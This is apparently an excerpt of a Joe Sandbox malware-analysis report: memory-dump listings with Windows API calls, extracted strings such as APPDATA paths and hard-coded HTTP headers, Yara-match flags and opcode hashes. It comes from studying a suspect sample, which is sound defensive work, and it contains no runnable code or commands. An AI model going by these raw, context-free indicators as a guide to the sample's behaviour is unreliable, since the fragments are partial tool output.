                                            • Opcode Fuzzy Hash: a43c74f0a017d1f7b27258233af7b0f8bd5ab01d46b0208e3573d12e86ff0486
                                            • Instruction Fuzzy Hash: 7AC1DE709006079ECB34CE69C584A7BBBB1AB45304F184A3FD452BBBD2C339AC59CB59
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0$H@
                                            • API String ID: 0-2786613154
                                            • Opcode ID: ca813c29726484238c91fef20f317be1219e422960450490370ba48bfc0cd99d
                                            • Instruction ID: 4a3fd9315a5abbba8fc5c956050257a45ee5a7b78c0dcd4935651e2db0378757
                                            • Opcode Fuzzy Hash: ca813c29726484238c91fef20f317be1219e422960450490370ba48bfc0cd99d
                                            • Instruction Fuzzy Hash: 9CB1E57090460B8BDB24CE6AC555ABFB7A1AF05304F140E3FD592B77C1C739A926CB89
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664793231.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4oz$Z_w_
                                            • API String ID: 0-3189895330
                                            • Opcode ID: d88f120c96f9d7210a929dfc8b24fbfb0ee7b6227cadcbea2a603efc5187d7e3
                                            • Instruction ID: adc6b3290ba318e1d4a402494d4c0c6dc826a04e65e40405a905db4013291aa3
                                            • Opcode Fuzzy Hash: d88f120c96f9d7210a929dfc8b24fbfb0ee7b6227cadcbea2a603efc5187d7e3
                                            • Instruction Fuzzy Hash: 6F6137B3A081109FE308AA6DEC5177ABBD5EBD4321F16493EEAC5D7384ED355C018786
                                            APIs
                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000E17F,?,?,00000008,?,?,1000DE14,00000000), ref: 1000E3B1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: ExceptionRaise
                                            • String ID:
                                            • API String ID: 3997070919-0
                                            • Opcode ID: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                            • Instruction ID: 1a3fbdf84673f95942c1f426381f735e0c8de5aa42652e790f36daf84cbc2009
                                            • Opcode Fuzzy Hash: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                            • Instruction Fuzzy Hash: 9CB14A31610649CFE715CF28C486B997BE0FF453A4F258658E89ADF2A5C335EE82CB40
                                            APIs
                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004156E9,?,?,00000008,?,?,0041C64A,00000000), ref: 0041591B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ExceptionRaise
                                            • String ID:
                                            • API String ID: 3997070919-0
                                            • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                            • Instruction ID: 5bcf9fd90164e7ff1602427bca0bed587a5bb36a9d426d5c8fdac6ccf5812400
                                            • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                            • Instruction Fuzzy Hash: 72B16C71520A08CFD715CF28C48ABE57BE0FF85364F258659E8A9CF2A1C339D992CB45
                                            APIs
                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04D25950,?,?,00000008,?,?,04D2C8B1,00000000), ref: 04D25B82
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionRaise
                                            • String ID:
                                            • API String ID: 3997070919-0
                                            • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                            • Instruction ID: 2801b67b2afc963d8376e690285d170d14bccdb0fdf469fad0e48d5a5d77fad3
                                            • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                            • Instruction Fuzzy Hash: 16B15A31210618EFD714CF28D59AB647BE0FF55369F298698E89ACF2A1D335E981CB40
                                            APIs
                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040A2C2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: FeaturePresentProcessor
                                            • String ID:
                                            • API String ID: 2325560087-0
                                            • Opcode ID: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                                            • Instruction ID: f7b9881a7c7b2d148b80d66715c196e1d6a207a6bc978660656b7b5c1fc1941f
                                            • Opcode Fuzzy Hash: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                                            • Instruction Fuzzy Hash: 395126B1E00705DBDB24CF95D885BAEBBE0FB48314F24843AD845EB3A0D37899518B99
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: 0
                                            • API String ID: 0-4108050209
                                            • Opcode ID: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                                            • Instruction ID: 266aa6246b0e6035129194902af3578424b33895b1f6540046232cb440783f45
                                            • Opcode Fuzzy Hash: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                                            • Instruction Fuzzy Hash: 83C1CA74A04606BEDB24CFA8E5846BABBB1FB46304F144A1DDC96D76B1D330F946CB60
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: 0
                                            • API String ID: 0-4108050209
                                            • Opcode ID: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                                            • Instruction ID: 751bda975517a49aa0e36fbb871a69ea3996f59e66c6ce64cf4c091bd36cf6aa
                                            • Opcode Fuzzy Hash: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                                            • Instruction Fuzzy Hash: C7B1AF70B0460AABDB24CF68E994ABEBBA1FF44304F14061EED96976B0D731F641CB51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664793231.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: NTDL
                                            • API String ID: 0-3662016964
                                            • Opcode ID: b8ebaf3dd641c9cd7850e625d9ae9fb37946fa8ca6ee77fe068cc95c7a2a8eae
                                            • Instruction ID: f6cae74657e03948cd5303e53a9b7fd65d8ecab369a71eeb2877a2e85ec86cf4
                                            • Opcode Fuzzy Hash: b8ebaf3dd641c9cd7850e625d9ae9fb37946fa8ca6ee77fe068cc95c7a2a8eae
                                            • Instruction Fuzzy Hash: 30811472988A3E8FDB158F14E5811EF7BE1FB56334F30412AD842D7A02E2B24DD19B58
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0000A6EC,0040A064), ref: 0040A6E5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: 57eb909cc499ab73dfbd1e7bda14dcacb44b248db614b08e85bbc339297afc36
                                            • Instruction ID: 6de328abc9b99a616df872271d62a2f30248adc2819e8ef2996fe7ca66473f4a
                                            • Opcode Fuzzy Hash: 57eb909cc499ab73dfbd1e7bda14dcacb44b248db614b08e85bbc339297afc36
                                            • Instruction Fuzzy Hash:
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(0040A6EC,04D1A2CB), ref: 04D1A94C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: 57eb909cc499ab73dfbd1e7bda14dcacb44b248db614b08e85bbc339297afc36
                                            • Instruction ID: 6de328abc9b99a616df872271d62a2f30248adc2819e8ef2996fe7ca66473f4a
                                            • Opcode Fuzzy Hash: 57eb909cc499ab73dfbd1e7bda14dcacb44b248db614b08e85bbc339297afc36
                                            • Instruction Fuzzy Hash:
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                                            • Instruction ID: cacb134cf45b6d3893a07543428c3496bc224f7c3d1c732b13d01dd1be495d2a
                                            • Opcode Fuzzy Hash: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                                            • Instruction Fuzzy Hash: DF323631E29F015DD7239A35D922336A649AFB73C4F56C737E815B5AA9EF28C4C34108
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664793231.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 27512dbce1650f601bfde0bd3ac02a87376571871174a8795c6e92a9a7318f2f
                                            • Instruction ID: d782e627636888b5d5938eb6138e05322512689bd1f9967ea0fc358326f82f81
                                            • Opcode Fuzzy Hash: 27512dbce1650f601bfde0bd3ac02a87376571871174a8795c6e92a9a7318f2f
                                            • Instruction Fuzzy Hash: 555146F3E441245BF714587CEC857A7BA86DBA0721F2B8239DE88E37C8E9799C0542C5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664793231.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4f37081e5ee5b0e039eb84a9388bcaeb1d3ae7f1f7a2866ba1a37ac6b9b3adc1
                                            • Instruction ID: 9e4cf423ff0fb0e11b1c85d7e5476e16daae5e93f598f53a586615380da8f62c
                                            • Opcode Fuzzy Hash: 4f37081e5ee5b0e039eb84a9388bcaeb1d3ae7f1f7a2866ba1a37ac6b9b3adc1
                                            • Instruction Fuzzy Hash: 7E412BF3A096045BE3016E2DDCC576AF7EBEFE8210F16853DD6C483744E53999118683
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664793231.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 30c76e4f955a0499a0f2ce11d26ce083e97331fa1b404c0c2d497b9578b1f430
                                            • Instruction ID: b88c27c4d5ac9a85e5619c0eab5b354373690314a65aa24db500e427918551d8
                                            • Opcode Fuzzy Hash: 30c76e4f955a0499a0f2ce11d26ce083e97331fa1b404c0c2d497b9578b1f430
                                            • Instruction Fuzzy Hash: FA316EF3618210ABE314992CEC457B7B7D9DB94330F2A863AFA94D73C0E97A9C0142D5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction ID: b545b07da7e7745530abcd8f67b80a540579b97e0dd86f1b90800f2e494ad7bb
                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction Fuzzy Hash: F1115B7720004243D604862DCDF45BBA395EBC5320B2C477BD0516BBD4D33BD841968D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction ID: 6858cf0c51ff5caabfc3a7f957f7e97cc4d55c404d013567cdc706fa4bfc5bf2
                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction Fuzzy Hash: 5111087774118243D681C56DC4F86ABA3DEFBC52A0729436AF0D28FA58D2F2DAC5A600
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction ID: f9b11c790c2a1a97a5dcc602ce95084896945f3579cb3a7f957fbe18259fc94a
                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction Fuzzy Hash: D511C4B734004267D6548A7DF4B42B6E795FBC7320B2D42BBD8814B77AD222F1479600
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2665403133.0000000000F4C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F4C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_f4c000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                            • Instruction ID: d4c61e27c7d1b93ddcd5993caf1c50a019aef958f4b98cf7b0d5f07853c263a2
                                            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                            • Instruction Fuzzy Hash: 1411CE72340104AFD780CF59DC91FA277EAEB8D360B298065ED04CB306E679EC41D7A0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664793231.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b663b192dbb2d4db85527ab8893cc70c191c2ab14a8f829bd4d76fa4f67c849f
                                            • Instruction ID: 9824168095b6cfc6bea71523f0b9a63ac59dd53474e69655a7cfcad24cc3ccb4
                                            • Opcode Fuzzy Hash: b663b192dbb2d4db85527ab8893cc70c191c2ab14a8f829bd4d76fa4f67c849f
                                            • Instruction Fuzzy Hash: F2F06DB658857E6DAA06CE44BA186FF7768F9C1730770843AF802C7911D2B14E85AA74
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                            • Instruction ID: c8289f9c297052bd3db4e64cfb9c3a6695d1bb689d24504931a86c199d93d02e
                                            • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                            • Instruction Fuzzy Hash: 1801F7727006009FDF22DF60E844BAA33E5FB86215F0584A4ED0A97A95E370B8818B80
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                            • Instruction ID: 49573a245b17cd2143a7f0a663dc82b9d5ba07e6c12e429f55ccbb336c262c76
                                            • Opcode Fuzzy Hash: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                            • Instruction Fuzzy Hash: CEE08C32E11228EBCB10CB88C940E8AB3ECFB86A80F114096B505E3101D274DF00C7C2
                                            APIs
                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,00409B7B), ref: 00409BA9
                                            • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00409B7B), ref: 00409BB4
                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00409B7B), ref: 00409BC5
                                            • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00409BD7
                                            • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00409BE5
                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00409B7B), ref: 00409C08
                                            • DeleteCriticalSection.KERNEL32(0042D064,00000007,?,?,00409B7B), ref: 00409C24
                                            • CloseHandle.KERNEL32(00000000,?,?,00409B7B), ref: 00409C34
                                            Strings
                                            • WakeAllConditionVariable, xrefs: 00409BDD
                                            • SleepConditionVariableCS, xrefs: 00409BD1
                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00409BAF
                                            • kernel32.dll, xrefs: 00409BC0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                            • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                            • API String ID: 2565136772-3242537097
                                            • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                            • Instruction ID: 37dafa969150eeb09f2d68ad9d46abae469e8d92b579355ddc2ecf38041403ba
                                            • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                            • Instruction Fuzzy Hash: 4B017531F44721BBE7205BB4BC09F563AE8AB48715F544032F905E22A2DB78CC078A6C
                                            APIs
                                            • __EH_prolog3_GS.LIBCMT ref: 10001CE7
                                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,00000264,1000202E,?), ref: 10001D2D
                                            • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000), ref: 10001DE9
                                            • GetLastError.KERNEL32(?,?,00000001,00000000), ref: 10001DF9
                                            • GetTempPathA.KERNEL32(00000104,?,?,?,00000001,00000000), ref: 10001E12
                                            • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ECC
                                            • GetLastError.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ED2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: CreateDirectoryErrorLastPath$FolderH_prolog3_Temp
                                            • String ID: APPDATA$TMPDIR
                                            • API String ID: 1838500112-4048745339
                                            • Opcode ID: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                            • Instruction ID: 65cc4f0b8c34a884811309b14049f09b1d2f67be4c4777eb46c939f585e6cab7
                                            • Opcode Fuzzy Hash: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                            • Instruction Fuzzy Hash: 6B515E70900259EAFB64EBA4CC89BDDB7B9EF04380F5005E9E109A6055DB74AFC4CF61
                                            APIs
                                            • __EH_prolog3_GS.LIBCMT ref: 100010CE
                                            • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001103
                                            • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001123
                                            • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001143
                                            • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001163
                                            Strings
                                            • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 10001125
                                            • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 10001145
                                            • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 100010D9
                                            • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 10001105
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: HeadersHttpRequest$H_prolog3_
                                            • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                            • API String ID: 1254599795-787135837
                                            • Opcode ID: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                            • Instruction ID: 505ec4d7c45309835e960384523a5e30396a54de81b8e769e2ad7823f420ed9d
                                            • Opcode Fuzzy Hash: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                            • Instruction Fuzzy Hash: DA119372D0010DEEEB10DBA9DC91DEEBB78EB18351FA0C019F22176051DB75AA45DBB1
                                            APIs
                                            • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0041CE8F), ref: 0041C3A8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: DecodePointer
                                            • String ID: acos$asin$exp$log$log10$pow$sqrt
                                            • API String ID: 3527080286-3064271455
                                            • Opcode ID: 05187ea62b41d2bf9bc39929cbb8bd1b88e738aa0c5724388b28886b27f4fa98
                                            • Instruction ID: c807006a3b6ff10d3a002f023a5ec1143af0d4f8941b6a10615b45774aafcbb0
                                            • Opcode Fuzzy Hash: 05187ea62b41d2bf9bc39929cbb8bd1b88e738aa0c5724388b28886b27f4fa98
                                            • Instruction Fuzzy Hash: A751CC7098422AEBCB108F98ED9C5FE7F71FB05304F908057D480A6664C7BC99A6CB5D
                                            APIs
                                            • type_info::operator==.LIBVCRUNTIME ref: 0040BDDA
                                            • ___TypeMatch.LIBVCRUNTIME ref: 0040BEE8
                                            • _UnwindNestedFrames.LIBCMT ref: 0040C03A
                                            • CallUnexpected.LIBVCRUNTIME ref: 0040C055
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                            • String ID: csm$csm$csm
                                            • API String ID: 2751267872-393685449
                                            • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                            • Instruction ID: 526bd2c442181307887733989819878d768e136a746cf2eec307868f2bd45ee9
                                            • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                            • Instruction Fuzzy Hash: EEB1477180020AEBCF25DFA5C8819AEBBB5EF04314B14416BE815BB292D738DA51CFDD
                                            APIs
                                            • type_info::operator==.LIBVCRUNTIME ref: 10004250
                                            • ___TypeMatch.LIBVCRUNTIME ref: 1000435E
                                            • _UnwindNestedFrames.LIBCMT ref: 100044B0
                                            • CallUnexpected.LIBVCRUNTIME ref: 100044CB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                            • String ID: csm$csm$csm
                                            • API String ID: 2751267872-393685449
                                            • Opcode ID: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                            • Instruction ID: 3d3d7b973083d5502e03e9704e538657a8ad6664bd6ca03923258a49de60437f
                                            • Opcode Fuzzy Hash: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
